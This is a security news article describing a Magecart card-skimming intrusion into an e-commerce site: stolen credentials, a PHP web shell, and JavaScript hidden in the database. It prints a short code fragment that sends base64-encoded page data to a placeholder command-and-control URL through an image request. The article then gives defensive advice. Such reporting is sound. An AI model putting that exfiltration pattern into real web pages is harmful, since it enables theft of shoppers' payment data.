The notorious Magecart group has been identified by the Yarix Incident Response Team as the culprits behind a recent credit card data theft operation on an e-commerce platform.
This latest assault on consumer data showcases the group’s evolving tactics to infiltrate and compromise online payment systems.
The attack began with Magecart utilising stolen credentials, likely harvested through an infostealer malware, to gain initial access to the website’s backend.
Once access was secured, the attackers uploaded a malicious PHP script to the server, which functioned as a web shell.
This web shell, based on the structure of the open-source P.A.S. Fork v. 1.4, provided them with complete remote control over the server, enabling persistent access and the ability to execute commands without regular user interaction.
Further investigation revealed that Magecart had infiltrated the site’s database, polluting it with hidden, malicious JavaScript code.
This code, disguised within a seemingly innocuous <img> tag, was designed to activate whenever certain pages were loaded, performing background operations like data exfiltration without user knowledge.
The script was embedded in a way that ensured its execution even if the initial access method was compromised, showcasing a deep level of persistence in their attack strategy.
The data exfiltration was ingeniously executed through two primary methods:
function createWebSocket() { // ... WebSocket setup and data exchange logic }
function createImage(dataToImg) { var objImage = new Image(); objImage.src = "//C&C server URL//?data=" + window.btoa(dataToImg); }
Magecart’s latest attack highlights the critical need for enhanced security measures in the face of evolving cyber threats.
Recommendations include strengthening password policies, implementing two-factor authentication, and ensuring all software is up-to-date.
Moreover, regular code audits, employing advanced XDR (Extended Detection and Response) systems, and installing web application firewalls are advised to detect and mitigate such attacks promptly.
This incident serves as a stark reminder of the persistent and adaptive nature of cybercriminals, urging a proactive approach to cybersecurity in the e-commerce sector.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A critical vulnerability discovered by Varonis Threat Labs has exposed users of Microsoft Azure’s AI…
Critical security vulnerabilities in Ubiquiti’s UniFi Protect surveillance ecosystem-one rated the maximum severity score of…
A critical security vulnerability in IXON’s widely used VPN client has exposed Windows, Linux, and…
Cisco has released security updates addressing a critical vulnerability in the Switch Integrated Security Features…
Microsoft has announced its support for the Agent2Agent (A2A) protocol, an open standard developed in…
Security researchers have uncovered two critical vulnerabilities in Radware’s Cloud Web Application Firewall (WAF) that…